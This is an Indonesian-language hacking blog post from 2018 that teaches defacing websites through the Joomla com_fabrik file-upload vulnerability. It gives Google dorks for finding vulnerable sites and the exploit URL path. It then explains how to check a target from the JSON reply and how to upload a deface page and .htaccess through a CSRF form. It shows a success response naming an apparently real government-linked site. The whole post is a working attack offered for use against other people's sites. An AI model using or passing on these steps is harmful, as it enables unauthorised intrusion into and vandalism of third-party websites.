Newest Post

Deface Metode Com_Fabrik CSRF

| Jumat, 07 September 2018
Baca selengkapnya »
   Lama Ga update cuy..
soory karena keterbatasan kuota hohoho :v

oke kali ini gua bakalan share cara deface metode Com_Fabrik CSRF
simak tutorialnya ea

Siapin dlu Dorknya
-Dork : inurl:index.php?option=com_fabrik
             inurl:index.php/component/fabrik/ site:.dk
             inurl:index.php?option=com_fabrik&view= site:
             inurl:importcsv.php site:
             inurl:viewTable?cid= site:com
kenbangin pake otak mesum lu ea..jngan cma khayalan yang dikembangin 😀 Kidding

 Exploitnya : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Truss htaccess nya DirumahGue
Csrf nya DirumahLu

Oke langsung aja simak baik2..
Pertama dorking dlu di google
 

Truss masukin tuh exploitnya d blakang link,,
contoh:  site.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

nah klo udah ditambahin nanti akan muncul kaya gini




nah kalo tulisanya kaya gini {"filepath":null,"uri":null} brarti tuh website vuln ea ..
langsung jadiin mangsa :v
setelah itu masukin tuh site.co.li nya ke CSRF
Itu yang Site.co,li nya diganti nama site target luh ea
nah setelah jadi langsung deh luh masukin scrip deface luh sama htaccess nya
jangan lupa ganti htaccess nya jadi nama sc lu ea kaya gini
nah setelah itu upload sc deface kalian dah akan kaya gini hasilnya
muncul tulisan {"filepath":"\/ilusi.html","uri":"http:\/\/www.pn-parepare.go.id.org\/ilusi.html"}
brarti sukses uploadnya
oke dan buka site kalian dan taraa terdeface ,,hohohoho :v

semoga berhasil ya jika ada pertanyaan silakan tulis di komentar
trima kasih bye...


Deface Metode Com_Fabrik CSRF

Posted by : PhobiaXploit
Date :Jumat, 07 September 2018
With 0komentar
Tag :
Next Prev
▲Top▲